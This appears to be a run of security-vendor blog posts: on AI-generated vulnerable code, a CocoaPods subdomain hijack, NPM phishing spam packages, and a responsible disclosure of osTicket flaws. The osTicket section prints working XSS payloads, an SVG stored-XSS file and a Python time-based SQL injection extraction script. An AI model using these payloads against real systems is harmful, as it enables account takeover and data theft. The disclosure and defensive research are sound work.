To no surprise, it also generates vulnerable code: there are SQL injection and XSS vulnerabilities in the PHP code. Instead of asking if the generated code was vulnerable, I asked if the first piece of code is vulnerable to Server-Side Template Injection (SSTI).

For some reason, ChatGPT answers that the code is indeed vulnerable to SSTI. Why is that? The answer explains the SQL injection vulnerabilities in detail but confuses them with SSTI. From my perspective, and without knowing the full details of the model, I assume that it was taught the wrong information, or inferred incorrect information by itself. So, it is possible to train the ChatGPT model with incorrect information, and since we can construct a thread and feed it knowledge, what happens if a significant number of people feed it malicious content?
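The fix for the actual SQL injection is parameterized queries. Since the generated example is PHP, here is a hedged Python/sqlite3 analogue of the same login check (table layout and values are made up for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password_hash TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'hash1')")

def login(name, password_hash):
    # Placeholders keep user input out of the SQL grammar entirely,
    # unlike a string-concatenated query.
    cur = conn.execute(
        "SELECT 1 FROM users WHERE name = ? AND password_hash = ?",
        (name, password_hash),
    )
    return cur.fetchone() is not None

print(login("alice", "hash1"))              # True
print(login("' OR '1'='1", "' OR '1'='1"))  # False: treated as literal data
```

The classic `' OR '1'='1` payload fails because the driver binds it as data, never as SQL.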

Final thoughts

A New Yorker article describes ChatGPT as a “Blurry JPEG of the Web” [6], which for me is a spot-on description. These models do not hold all the information about a specific programming language, and most of the time they cannot place code in its proper context. For that reason, even if the code looks correct or does not present any “visible” vulnerabilities, that does not mean that, when inserted in a specific context, it will not create a vulnerable path.

We cannot deny that this technology represents a huge advancement, but it still has flaws. AI is developed and trained by humans; as such, are we not creating a loophole where we feed the models our own mistakes and malicious content? And with the increase in supply chain attacks and misinformation, the information used to train the models may be tainted.

When it comes to generating or analyzing code, I would not trust them to be correct. Sometimes they do work, but they are not 100% accurate. Some of the assistants mention possible limitations; however, these limitations cannot be quantified. Source code analysis solutions that use the GPT-3 model are appearing (e.g., https://hacker-ai.online/), but they too share the same limitations and problems that ChatGPT has.

AI assistants are not perfect, and it is still necessary to have code review activities and AppSec tools (SAST, SCA, etc.) to help increase an application’s security. Developers should be aware of that and not lose their critical thinking: copy-pasting everything the assistants generate can still introduce security problems. AI in coding is not a panacea.

References

[1] https://securityintelligence.com/from-waterfall-to-secdevops-the-evolution-of-security-philosophy/

[2] https://arxiv.org/pdf/2108.09293.pdf

[3] https://arxiv.org/pdf/2007.02220.pdf

[4] https://openai.com/blog/chatgpt/

[5] https://www.forbes.com/sites/cindygordon/2023/01/27/why-yann-lecun-is-an-ai-godfather-and-why-chatgpt3-is-not-revolutionary/?sh=32a235087a64

[6] https://www.newyorker.com/tech/annals-of-technology/chatgpt-is-a-blurry-jpeg-of-the-web

CocoaPods Subdomain Hijacked: This is How https://checkmarx.com/blog/cocoapods-subdomain-hijacked-this-is-how/ Thu, 02 Mar 2023 15:00:00 +0000 https://checkmarx.com/?p=81937 CocoaPods is THE dependency manager for iOS and Mac projects. It helps software developers easily add pre-made pieces of code (called “libraries” or “dependencies”) to their iOS or Mac projects. These code libraries can help developers add extra features or functionality to their apps without having to write all of the code themselves. Think of it like adding pre-made Lego pieces to a Lego creation to make it better or more interesting.

Subdomain Hijacking

Subdomain hijacking is a type of cyber attack where an attacker takes control of a subdomain of a legitimate domain, and uses it to host malicious content or launch further attacks.

In a subdomain hijacking attack, the attacker can find forgotten settings on free hosting websites such as GitHub Pages, which are not mapped anymore. The weak validation grants attackers permission to use those subdomains.

CocoaPods Casino

Guy Nachshon, a brilliant security researcher on my team, found that the subdomain cdn2.cocoapods.org had been used years ago and then abandoned. However, the DNS records still pointed to the GitHub Pages hosting service, and attackers hijacked it to host a fishy casino website.

While we were investigating this, the subdomain got freed on GitHub Pages (probably due to an update/mistake of the attackers).

We jumped on the opportunity and created a simple repository to hold this subdomain and prevent another takeover by those casino attackers.

This works as long as the subdomain is not occupied by another GitHub Pages project, and it is super simple to set up: go to Settings, enable GitHub Pages, and type the subdomain “cdn2.cocoapods.org”:
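For context, entering a custom domain in the Pages settings simply commits a plain-text CNAME file to the repository root; that one-line file is all it takes to claim the subdomain:

```text
cdn2.cocoapods.org
```

Combined with the dangling DNS record, that single file is what made both the attack and our defensive takeover possible.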

Watch this short demo video to see it in action:

Impact

Generally speaking, the impact of hijacking a subdomain of a known website can trick users into thinking the content they are seeing is legitimate and created by the known brand.

Furthermore, organizations usually allow network traffic to such dev-related legitimate resources from sensitive networks to support the engineering process.

Last year, we saw cases in which attackers hosted a malicious exe file on GitHub, and another in which an image hosted on imgur.com contained malicious Python code. Hence, the potential of hijacking a subdomain of a popular and legitimate brand is quite clear.

Conclusion

I disclosed the findings to CocoaPods in this GitHub issue, and huge respect for the fast response and removing the subdomain record.

It’s ridiculous how easy it is to take over an abandoned subdomain. This made me wonder – should this be that easy? Should GitHub enforce 2-way validation when linking a domain to a GitHub Pages project? Like validating the exact repository URL? IMHO – yes.

See this case as a warning if you have created subdomain records for side-projects that over time became obsolete, like cdn2.cocoapods.org. I suggest removing them, as someone might hijack your subdomain.

How NPM Packages Were Used to Spread Phishing Links https://checkmarx.com/blog/how-npm-packages-were-used-to-spread-phishing-links/ Tue, 21 Feb 2023 18:28:45 +0000 https://checkmarx.com/?p=81849

Unveiling the Latest NPM Ecosystem Threat: Thousands of SPAM Packages Flood the Network, A New Discovery by Checkmarx

What Happened?

  • A sudden surge of thousands of SPAM packages were uploaded to the NPM open-source ecosystem from multiple user accounts within hours.
  • Further investigation uncovered a recurring attack method, in which cyber attackers utilize spamming techniques to flood the open-source ecosystem with packages that include links to phishing campaigns in their README.md files.
  • The packages were created using automated processes, with project descriptions and auto-generated names that closely resembled one another.
  • The attackers referred to retail websites using referral IDs, thus profiting from the referral rewards they earned.
  • The packages appeared to contain the very same automation code used to generate these packages, probably uploaded by mistake by the attacker.
  • As first recognized in this tweet by Jesse Mitchell, the generating scripts also include valid credentials used by the attacker in the attack flow.

NPM Anomalies

Our technology collects and indexes evidence related to packages from all open-source ecosystems, allowing us to query historical data for new insights.

On Monday, 20th of February, Checkmarx Labs discovered an anomaly in the NPM ecosystem when we cross-referenced new information with our databases. Clusters of packages had been published in large quantities to the NPM package manager. Further investigation revealed that the packages were part of a trending new attack vector, with attackers spamming the open-source ecosystem with packages containing links to phishing campaigns. We reported on a similar attack last December.

In this situation, it seems that automated processes were used to create over 15,000 packages in NPM and related user accounts. The descriptions for these packages contained links to phishing campaigns. Our team alerted the NPM security team.

Phishing Sites in Package Description

The attackers used a large number of packages with names related to hacking, cheats, and free resources to promote their phishing campaign. Some of the package names included “free-tiktok-followers,” “free-xbox-codes,” and “instagram-followers-free”. These names were designed to lure users into downloading the packages and clicking on the links to the phishing sites.

The descriptions of all the packages we found contained links to phishing sites.

The messages in these packages attempt to entice readers into clicking links with promises of game cheats, free resources, and increased followers and likes on social media platforms like TikTok and Instagram.

The phishing campaign linked to many unique URLs across many domains, with each domain hosting multiple phishing webpages under different paths. The deceptive webpages are well-designed and, in some cases, even include fake interactive chats that appear to show users receiving the game cheats or followers they were promised.

These chats will even respond to messages if the reader chooses to participate, but these are all automated and fabricated. This highlights the need for caution when interacting with links in packages and the importance of only using trusted sources.

The websites included a built-in fake flow that pretended to process data and generate the promised “gifts.” However, this process failed most of the time, and the victim was then pushed into a “human verification” phase that involved multiple sites referring the user from one to another. These sites included surveys that asked the user various questions, leading to additional surveys or eventually to legitimate eCommerce websites.

Referrals Rewards

While investigating the phishing websites, we noticed that some of them redirected to eCommerce websites with referral IDs. For example, one of our experiments resulted in being redirected to AliExpress, one of the world’s largest online retail platforms. Like many other retail websites, AliExpress offers a referral program that rewards members for referring new customers to the platform. If the threat actors refer their victims to AliExpress and they make a purchase, the threat actors’ account will receive a referral reward in the form of a coupon or store credit. This highlights the potential financial gain for threat actors who engage in phishing campaigns like this one.

Did the Attacker make a mistake?

Throughout many of the packages, we found similar Python scripts with similar functions that seemed to be the ones automatically generating and publishing the spam packages. We also found “helper.txt” files that seemed to be part of the same automated mechanism. The most interesting file is a Python script within the NPM packages that includes all steps of the package publication.

The flow of the Python script is as follows:

  • Defines folder paths containing configuration files.
  • In some cases, defines a list of website URLs and their login credentials (which it later uses to publish links to the uploaded packages).
  • Loops through the folder paths and reads configuration files to get a domain name and keyword.
  • Generates random titles and descriptions using the configuration files.
  • Generates a random link for new content using the title along with a random number.
  • Creates the following files: index.js, package.json, and README.md based on templates and modifies them to include the new link and titles.
  • Uploads the new package to NPM using the npm publish command.
  • Checks if the upload was successful and writes the URL to a file.
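The content-generation steps above can be sketched as a defanged Python script (all names, templates, and the placeholder domain are mine; unlike the attacker’s script, this publishes nothing):

```python
import json
import random
import string

def random_title(keyword):
    """Step 4: build a random, keyword-based package name."""
    suffix = "".join(random.choices(string.ascii_lowercase, k=6))
    return f"{keyword}-{suffix}"

def build_package(keyword, domain):
    """Steps 5-6: generate package.json and a README.md embedding the
    campaign link (here a reserved .invalid placeholder domain)."""
    title = random_title(keyword)
    link = f"https://{domain}/{title}-{random.randint(1000, 9999)}"
    package_json = json.dumps({"name": title, "version": "1.0.0"})
    readme = f"# {title}\n\nGet it here: {link}\n"
    return package_json, readme

pkg, readme = build_package("free-followers", "example.invalid")
```

The real script then ran `npm publish` on the generated folder and logged successful URLs, which is what allowed thousands of near-identical packages to appear within hours.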

Generating random content for new NPM packages

Generating package files and publishing to NPM

After completing the publication of all packages in the current batch, the attacker goes on to the last automated task.

From what we see thus far, the attacker created or at least has access to several news-like websites in which they can publish content.

The last task in the Python scripts is appending links to unrelated posts on these news-like websites. These links direct to the pages of the packages they published on NPM’s website.

To do that, the attacker uses the “selenium” Python package to interact with these WordPress websites. First, they need to authenticate as an editor, and only then can they post the packages’ links.

We believe the upload of these Python scripts was not done intentionally by the attacker. A significant sign is that the scripts include the credentials used to authenticate with the WordPress websites, as was first recognized in this tweet by Jesse Mitchell.

Conclusion

These attackers invested in automation in order to poison the entire NPM ecosystem with over 15,000 packages. This allowed them to publish a large number of packages in a short period of time, making it difficult for the different security teams to identify and remove the packages quickly. The attackers also created many user accounts, making it difficult to trace the source of the attack. This shows the sophistication and determination of these attackers, who were willing to invest significant resources in order to carry out this campaign. Interestingly, it appears that this is the same attacker as a previous spam attack we detected last December.

The battle against threat actors poisoning our software supply chain ecosystem continues to be a challenging one, as attackers constantly adapt and surprise the industry with new and unexpected techniques.

By working together, we can stay one step ahead of attackers and keep the ecosystem safe. We believe this kind of collaboration is crucial in the fight against software supply chain attacks, and we will continue working together to help protect the open-source ecosystem.

List of Packages

The scale of this phishing campaign is significant, and you are welcome to download the full dataset hosted on GitHub Gist

https://gist.github.com/masteryoda101/a3f3500648f7e6da7bf89b3fb210e839

This will allow you to further analyze the data and gain a better understanding of the scope and nature of the attack.

If you would like access to the original metadata or samples from this phishing campaign, please feel free to send an email to supplychainsecurity@checkmarx.com. Our team will be happy to provide you with the information you need.

IOC

In total, we analyzed over 190 unique URLs, which we were able to reduce to approximately 31 domains.

betapps[.]club

stumblegems[.]site

tubemate[.]vip

followersfree[.]store

apostasesportiva[.]info

sahel-digital-art[.]org

xapk[.]online

dailyspins[.]store

press-citizen-media[.]com

rebrand[.]ly

t[.]co

shahidvip[.]com

newjesuitreview[.]org

nbadeadlines[.]com

fundacionsuma[.]org

nftscollection[.]online

legalcoins[.]vip

canva-pro-free-accounts[.]blogspot[.]com

trendcoffee[.]cc

journaldogs[.]com

free4free[.]monster

redapk[.]xyz

elavil[.]store

hiromi-haneda[.]com

claptonfc[.]info

coolhack[.]us

generators[.]searchbuzz[.]co

baby-ace[.]net

crestor[.]store

nfljerseys[.]fun

Securing Open-Source Solutions: A Study of osTicket Vulnerabilities https://checkmarx.com/blog/securing-open-source-solutions-a-study-of-osticket-vulnerabilities/ Tue, 14 Feb 2023 15:48:44 +0000 https://checkmarx.com/?p=81721 Nowadays, there are open-source solutions for every type of need. From accounting to CMS (Content Management System) applications, we can search the Internet for an application that offers a solution to a specific issue or answers a need. Although most of the time this will be easier and faster than reinventing the wheel, using open-source applications may create some challenges. Security is one of those challenges, and zero-day vulnerabilities may put open-source users at risk.

With that in mind, one of the activities performed by Checkmarx Labs is to search for security issues in open-source applications. The goal is to help secure open-source software which, usually, is not developed with a security-first approach, and is used by a community that often does not have the means to secure the open-source software.

One of the applications assessed was osTicket, an open-source ticketing system. With distinctive features and plugins, osTicket gives users the ability to “Manage, organize, and archive all your support requests and responses (…).” During our assessment, the Checkmarx Labs team found some interesting vulnerabilities. In this blog/report, not only will we disclose some of the identified vulnerabilities but also elaborate on the team’s approach to identifying them.

Research Lab

The process that we follow, from creating a testing instance with the open-source application to finding the vulnerabilities, includes several steps. One of the first steps is to perform a static analysis scan (SAST) of the project, which will scan the code and find data flows that could lead to possible vulnerabilities. The use of this method often increases the number of issues found and is very useful when conducting these assessments. To validate the exploitability of the scan findings, we create a virtual machine (VM) and install the application in order to have a local environment for further testing. This way, we can confirm the existence of vulnerabilities and widen the assessment scope by performing a full penetration test, using both manual and automatic methodologies.

Methodology

After finalizing the first steps, we analyze scan results and identify the flows that lead to identified vulnerabilities. Although the scan simplifies the process, we also need to understand the application source code to find the “vulnerability entry point” (the input) and the flows that can be exploited. For example, during the analysis of the results, we identified some strange code injection results ending at “variable variables” [1]. This meant that user input controlled a variable name, which, although not uncommon, is dangerous behavior.

Figure 1 – Variable $sort, from the GET parameter, controlling the initial part of the variable name $x

In this case, the string “_sort” was appended to the variable before its usage. We could not find any interesting variable name with that pattern. So, while the code potentially allows overwriting arbitrary variables, their names would have to end in “_sort”. This means the code has a weakness, but it is not exploitable in a meaningful way.

There were a few different SAST results on this matter, and we decided to look further:

Figure 2 – Request parameter concatenated to a raw HTML string at a user-controlled variable

At the directory.inc.php file, the $_REQUEST parameter was added directly to this string which appeared to be an HTML string, and yes, it was being used in multiple table headers. And of course, it would not be so simple.

We discovered that osTicket had a custom HTML sanitization method, applied to many other HTML inputs, which was not a very standard way of sanitizing input:

Figure 3 – Request parameters filtered before usage in directory.inc.php

This is an example piece of their sanitization method:

Figure 4 – A fraction of the Format::sanitize blacklist function

Although this method has some complexity, blacklisting specific strings and focusing on sanitizing HTML tags is not an effective way to sanitize the input, since it is difficult to be aware of every possible context and special characters that can be used to build an exploit.
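The robust alternative to blacklisting is contextual output encoding. osTicket is PHP, so as a hedged Python analogue, the standard library’s html.escape shows the idea: with quote=True, the double quote the later PoC relies on is encoded and can no longer terminate the attribute:

```python
from html import escape

# Simplified attacker-controlled value from the kind of payload
# discussed later in this post (attribute-breaking XSS).
payload = 'DESCE" onmouseover="alert(1)" style="position:fixed;'

# Encode for an HTML attribute context instead of blacklisting tags.
safe = escape(payload, quote=True)
attr = f'<a href="?order={safe}">Name</a>'
print(attr)
```

Because every `"` becomes `&quot;`, the input stays inside the attribute value regardless of which tags or event handlers it mentions.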

After this analysis, we tried the only thing left, which was to confirm the vulnerability (in a local testing environment) explained in the Reflected XSS, CVE-2022-32132 section below.

To confirm the vulnerabilities’ existence in the application, we created our own environment by setting up the application in a VM and then performed the dynamic tests. With this environment, we not only confirmed the results found, but could also find different vulnerabilities that are easier to discover with a dynamic testing approach.

Findings

Reflected XSS, CVE-2022-32132

A Reflected XSS [2] was found in osTicket, allowing an attacker to inject malicious JavaScript into a browser’s DOM, which could enable attackers to hijack user sessions, perform actions on a user’s behalf within that user’s session context, and more.

After the analysis described in the Methodology, we validated that the vulnerability does exist in the application. Our first goal was to understand and escape the sanitizer. Sure enough, some special characters allowed us to discover this Reflected XSS vulnerability in the ‘directory’ URL, which is available by default in every osTicket installation. The blacklist was prepared to block user input from escaping HTML tags or creating dangerous tags like <script>, but in this specific scenario, the input was placed inside an attribute, and escaping from attributes was still possible. One of the obvious payloads uses the onmouseover attribute, which runs its value as JavaScript when the mouse moves over the component.

Figure 5 – XSS payload executed

Figure 6 – Source page code with the XSS payload

There are some things that can be done to increase the value (or risk) of this vulnerability, the first being to make it easier to attack the victim. An easy way of achieving this is to also inject the style attribute of the vulnerable HTML tag to make it cover the whole screen, making it almost inevitable that a victim visiting the URL triggers the payload.

/scp/directory.php?&&order=DESCE%22%20onmouseover=%22alert(1)%22%20style=%22position:fixed;top:0px;right:0;bottom:0px;left:0px;&sort=name

Another thing that can be done is to leverage this vulnerability by using other weaknesses. We found two cases that can be abused for that purpose:

  • A stored HTML injection in the “notes” section can be abused to plant a permanent attack vector inside the application that redirects the user to the Reflected XSS, making it, in practice, a stored XSS.
  • A CSRF in the “change password” functionality can be used as a payload for the XSS, allowing an attacker to change the user password of the victim.

Because the directory.php page is part of the admin panel, these steps can escalate this vulnerability from a simple Reflected XSS to a Stored XSS capable of full admin account takeover, without requiring any installed plugins.

Reflected XSS, CVE-2022-31889

In the Audit plugin, we found two Reflected XSS results where user input from the type or state parameters was inserted into the HTML without being sanitized. The fix adds the missing sanitization for these inputs. A procedure similar to the one presented in the Methodology section was followed when analyzing the plugin results.

After the analysis and confirmation that it was a True Positive, we validated that it was indeed vulnerable to XSS. Looking at the code in which the vulnerability occurs, we can see how easily it can be exploited:

Figure 7 – type variable insert in the HTML without sanitization

The input from the type and state parameters is inserted into the “a” tag without any sanitization. We can just close the href quote and the tag (>) and insert a simple script tag.

Figure 8 – XSS payload executed

Figure 9 – Source page code with the XSS payload

SQL injection, CVE-2022-31890

In the same plugin (Audit), we came across a SQL Injection result where user input from the order parameter was inserted into a SQL query without proper sanitization. Looking at the fix, the old code contained an if statement that checked whether the order query parameter existed in the orderWay array. The problem is that this array was never defined, so PHP issues a Notice and the if condition is always false. The correction adds the missing array and changes some of the sanitization logic for the order variable.

Figure 10 – order_by variable concatenated directly into SQL query

After confirming that the flow was indeed vulnerable, a Proof-of-Concept was created to demonstrate the real impact, as shown in Figure 13. By exploiting the SQL injection vulnerability, an attacker could obtain password hashes, PII, and access-privilege information. Because the injection occurs after an ORDER BY clause, the possible injection is limited. A SQL injection after ORDER BY differs from other cases (after a WHERE clause, for example) because the database does not accept UNION, WHERE, OR, or AND keywords there. Nested queries are still possible, and multiple statements could be stacked with a semicolon, but only if the method that executes the queries allows multi-statement execution, which it does not in this case. Nonetheless, a blind time-based injection is possible, allowing data extraction from the database.

Example of a regular request:

Figure 11 – Normal request to the audits.php page

Sleep injection:

Figure 12 – Sleep injection result in the audits.php page

With this knowledge, we can create a data-extraction script that triggers a sleep when a particular condition is met, such as a specific character in the user’s table matching one provided by us.

import requests
import urllib.parse
import string

HOSTNAME = 'http://localhost'
cookie = {'OSTSESSID': '...'}
headers = {'User-Agent': '...'}

alphabet = string.ascii_lowercase + string.digits + '-_!'
position = 1  # character position inside the username
offset = 0    # row offset inside the os_staff table

for letter in alphabet:
    # Time-based probe: the query sleeps only when the guessed letter matches
    payload = ("(select case when ((select substring(username," + str(position)
               + ",1) from os_staff LIMIT 1 OFFSET " + str(offset) + ")='"
               + letter + "') then sleep(0.3) else 1 end);")
    result = requests.get(HOSTNAME + '/scp/audits.php?&type=S&state=All&order=ASC,'
                          + urllib.parse.quote(payload) + '--&sort=timestamp&_pjax=%23pjax-container',
                          cookies=cookie, headers=headers)
    # A noticeably slower response signals that the guess was correct
    if result.elapsed.total_seconds() > 2:
        print(letter)
        break

Figure 13 – Python script that obtains the first username character of the first os_staff table entry
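The script above probes a single character. Under the same assumptions (endpoint, session cookie, and delay threshold), the probe can be wrapped in a loop that reconstructs an entire username; below is our sketch, not part of the original PoC, with the request-sending step abstracted into a `probe` callable so the extraction logic is visible on its own.

```python
import string

def build_payload(position, offset, letter):
    # Same time-based probe as above: sleeps only when the guess matches
    return ("(select case when ((select substring(username,"
            + str(position) + ",1) from os_staff LIMIT 1 OFFSET "
            + str(offset) + ")='" + letter
            + "') then sleep(0.3) else 1 end);")

def extract_username(probe, max_len=32):
    """Recover a username character by character. `probe` sends one
    injected request and returns True when the response was delayed."""
    alphabet = string.ascii_lowercase + string.digits + '-_!'
    username = ''
    for position in range(1, max_len + 1):
        for letter in alphabet:
            if probe(build_payload(position, 0, letter)):
                username += letter
                break
        else:
            break  # no letter matched: we reached the end of the name
    return username
```

In practice, `probe` would issue the same requests.get call as the script above and compare `elapsed.total_seconds()` against the threshold.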

Session fixation, CVE-2022-31888

SAST tools increase the number of security issues that can be found, yet code analysis alone is not enough to find every kind of problem. For example, while interacting with the application we found a session fixation issue that is difficult to notice through code review.

Due to the nature of the problem, verifying that a new session is generated and the old one is terminated in the correct place is complex. Most of the time, a clear understanding of the code base is required to spot a session fixation issue; the same applies to other types of vulnerabilities that can be chained together to create a higher risk. Dynamic testing is also necessary to find other types of vulnerabilities, or vulnerabilities that trigger only in specific situations.

In this case, the application provides two login pages: one for the admin panel and another for the user portal. While testing both interfaces, we observed that the existing session cookie (shared by both interfaces) is not invalidated after a login.

We found this vulnerability while fuzzing the login pages. When a login succeeds, the server should invalidate the previous session and create a new one by sending it in the Set-Cookie header. This did not happen, and it was also possible to define our own session identifier.

Figure 14 – Set-Cookie with controlled cookie

Figure 15 – Session cookie controlled

If an attacker can access or control the session value before authentication, an authenticating user would be logging into a session already known to the attacker, who could then hijack it.
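A quick dynamic check for this class of issue can be scripted: plant a known session identifier before authenticating and verify whether the server rotates it afterward. The sketch below is illustrative only; the login URL and form field names are assumptions, not necessarily osTicket's actual ones.

```python
import requests

LOGIN_URL = 'http://localhost/scp/login.php'  # assumed endpoint
ATTACKER_SID = 'attacker-chosen-session-id'

def is_fixation_vulnerable(pre_login_sid, post_login_sid):
    # Vulnerable when the server keeps (or never replaces) the
    # pre-authentication session identifier after a successful login.
    return post_login_sid is None or post_login_sid == pre_login_sid

def check_login(username, password):
    session = requests.Session()
    # Plant a session identifier we control before authenticating
    session.cookies.set('OSTSESSID', ATTACKER_SID)
    session.post(LOGIN_URL, data={'userid': username, 'passwd': password})
    return is_fixation_vulnerable(ATTACKER_SID, session.cookies.get('OSTSESSID'))
```

A hardened server would answer the login with a fresh Set-Cookie value, making `check_login` return False.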

Stored XSS, CVE-2022-32074

While dynamically analyzing the Filesystem Storage plugin, we came across two issues:

1 – It is possible to browse directly to the root of the file upload directory (in this example, the folder is named file_uploads). This makes a directory listing possible, as shown below.

Figure 16 – File uploads directory content

2 – Images served via this storage do not properly neutralize SVG content, which can carry XSS payloads. For example, uploading the following XML inside a JPG file causes its contents to be served as SVG.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="200" height="200" style="fill:rgb(0,255,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Stored XSS!!");
   </script>
</svg>

By exploiting these two issues, we were able to find a Stored XSS.

Figure 17 – XSS payload executed after accessing the image
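One defense against the second issue is to reject “images” that are really SVG documents carrying active content. The following is a minimal illustrative check, not the plugin's code, and real sanitizers cover many more vectors (such as xlink:href and foreignObject):

```python
import xml.etree.ElementTree as ET

def svg_has_active_content(data):
    """Return True if the bytes parse as an SVG document containing
    script elements or on* event-handler attributes."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return False  # not well-formed XML, so not an SVG payload
    if root.tag.split('}')[-1] != 'svg':  # strip any XML namespace
        return False
    for elem in root.iter():
        if elem.tag.split('}')[-1] == 'script':
            return True
        # onload, onclick, onmouseover, ... also execute JavaScript
        if any(attr.lower().startswith('on') for attr in elem.attrib):
            return True
    return False
```

A safer policy still is to verify the file's magic bytes against the declared image type and serve uploads with a non-executable Content-Type.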

Conclusion

While injection vulnerabilities such as SQLi and XSS are among the best-understood security issues, with widely documented mitigation techniques, they still top the list of vulnerabilities found. According to an Akamai report, “the top three web application attacks were LFI (38%), SQLi (34%), and XSS (24%).”

These issues mainly arise because developers do not consider that all data should be sanitized. Whether coming from user input or a database, data should always be sanitized. There are also cases where custom sanitizers are implemented but do not cover all cases, and attackers find ways to bypass them [3].
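The point about custom sanitizers can be illustrated with the attribute-context bypass from the osTicket finding. The sketch below contrasts a naive blacklist with context-aware output encoding; both functions are illustrative, not osTicket's code.

```python
import html

def blacklist_sanitize(value):
    # Naive blacklist: strips <script> tags but ignores attribute contexts
    return value.replace('<script>', '').replace('</script>', '')

def attribute_encode(value):
    # Context-aware encoding: the quote that would close the attribute
    # becomes a harmless entity, so the input cannot escape it
    return html.escape(value, quote=True)

payload = '" onmouseover="alert(1)'
print(blacklist_sanitize(payload))  # the attribute-breaking quote survives
print(attribute_encode(payload))    # prints &quot; onmouseover=&quot;alert(1)
```

This is why the OWASP guidance below recommends output encoding appropriate to the HTML context rather than input blacklisting.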

OWASP provides a Cheat Sheet series that developers can use to understand the vulnerabilities and how to prevent them [4] [5].

The research was conducted in testing environments, and no production systems were used to test or exploit the previously mentioned vulnerabilities.

Timeline

  • April 20, 2022 – Full vulnerabilities report shared with osTicket team.
    • osTicket team acknowledged receipt.
  • May 19, 2022 – Fix released.
  • June 22, 2022 – CVE-2022-31888, CVE-2022-31889, CVE-2022-31890 assigned.
  • July 13, 2022 – CVE-2022-32074 assigned.
  • July 21, 2022 – CVE-2022-32132 assigned.
  • February 14, 2023 – Public disclosure

Final Words

It was a pleasure working with osTicket’s security team. Their professionalism and cooperation, as well as the prompt ownership they took, are what we hope for when we engage with software companies. Kudos!

This type of research activity is part of the Checkmarx Security Research Team’s ongoing efforts to drive the necessary changes in software security practices among organizations that offer online services, with the goal of improving security for everyone.

References

[1] https://www.php.net/manual/en/language.variables.variable.php

[2] https://portswigger.net/web-security/cross-site-scripting/reflected

[3] https://owasp.org/www-community/Injection_Theory

[4] https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

[5] https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html


Open Source vs Commercial AppSec Tools: Considerations for Enterprise
https://checkmarx.com/blog/open-source-vs-commercial-appsec-tools-considerations-for-enterprise/
Wed, 01 Feb 2023

There are a plethora of free and open source AppSec testing tools available on the internet, and many of them are quite good; some top-of-mind shining examples (picked at random, of course) are KICS, DustiLock, and ChainAlert. With so many free and open source AppSec tools available, it may be tempting to ask, “do enterprises really need to purchase Application Security Testing solutions?” After all, most organizations have teams of in-house developers who are naturally inclined to think “we can build that” or “why pay for something we can get for free?” And any CISO would be remiss if he or she didn’t consider at least some free tools to help keep expenses to a minimum and organizational leadership happy.

However, as tempting as it may be to roll up your sleeves and follow an entirely free and open-source approach to AppSec testing, CISOs and AppSec teams need to weigh all the considerations when building or selecting AppSec solutions: total cost of ownership (TCO); the opportunity cost of building, integrating, and maintaining custom AppSec solutions; and keeping abreast of the ever-changing attack landscape. All of these factors culminate in overall risk: risk to an organization’s data, its customers, and its reputation.

Total Cost of Ownership (TCO) and Opportunity Cost

Most free or open-source tools are technology-specific (e.g., language, framework, technology). This means to adequately cover and help secure custom application code, third-party code, infrastructure as code, APIs, or other software attack vectors (e.g., software supply chain), many different tools are needed and often one suite of tools won’t work across multiple projects. This produces a disjointed approach to AppSec within DevSecOps and relegates control to individual developers with little oversight from security teams or executives.

Pragmatically, these tools all work differently: they do not integrate with one another, they are rigid in how they can be implemented, and they do not scale to the enterprise level. To integrate them effectively, organizations must devote engineering hours to building, plumbing, and operationalizing them along with their required supporting infrastructure and applications (whether on-premises or in the cloud). Organizations must also devote time and resources to updating, maintaining, and troubleshooting these solutions, ultimately increasing the total cost of ownership (TCO) of these otherwise free tools.

Moreover, AppSec leaders and CISOs need to weigh the opportunity costs of Dev and DevOps teams not focusing on building or facilitating the production of the enterprise’s actual product. As an example, if your organization’s primary product is mobile applications, any developer, DevOps, or Security time spent customizing, integrating, or modifying AppSec testing software to meet the enterprise’s needs is time not spent building mobile apps.

Deploying, integrating, and maintaining custom solutions is only half the battle. When you factor in the varied results across multiple scan engines, such as SAST, SCA, SCS, API Security, and Infrastructure-as-Code, it becomes readily apparent that being able to consume and prioritize results within a single platform can save significant time and overhead in identifying and remediating application risks.

Commercial products also come with a simple, predictable cost structure, which makes budgeting and planning AppSec initiatives and calculating ROI much easier.

Siloed Knowledge and Threat Intelligence

Most AppSec professionals (or teams) are knowledgeable about pockets of vulnerabilities, application code weaknesses, runtime environments, developer operations, technology stacks in use, and available tooling; as such, they are only able to provide expertise that is narrowly focused and may not encompass the entire attack landscape of an organization. For this reason, many (if not most) companies (even the big ones) either need or want to leverage the expertise of application security companies—from a product or partnership perspective.

Building a completely bespoke or piecewise AppSec solution introduces a significant risk of “unknown unknowns”: organizations can suffer from tunnel vision, focusing only on security vulnerabilities or exploits their teams have observed. This can introduce significant blind spots and overlooked vulnerabilities with potentially dire consequences. In an ever-evolving threat landscape, relying on internal teams or unknown (hopefully benevolent) open source contributors may leave organizations reactive rather than proactive, exposing them to potentially existential risk.

One particularly illuminating example: without supply chain security capabilities, developers and AppSec teams would have to continuously monitor social media or GitHub comments for every version of the open source packages used in their projects, both explicitly and as dependencies, which could easily number in the hundreds of thousands.

Support, Maintenance, and Updates

Another pitfall to consider with open source or free solutions is that they rarely offer the same level of customer support as a commercial AppSec solution. Software and feature support aside, consultation, planning, education, and developer adoption services are lacking or non-existent for free or open-source solutions. Consumers of these solutions must navigate significant overhead to manage many disparate tools, slow reactions by tool maintainers as threats emerge or change, and incomplete or defective offerings for which nobody can be held accountable.

Support and services aside, commercial AppSec solutions offer consistent and reliable updates and maintenance. Commercial AppSec vendors have quality-focused teams to test and validate their application and software updates prior to their release. In contrast, open-source projects typically rely on a community of engaged volunteers to perform quality assurance functions ad-hoc, then report findings back to project maintainers.

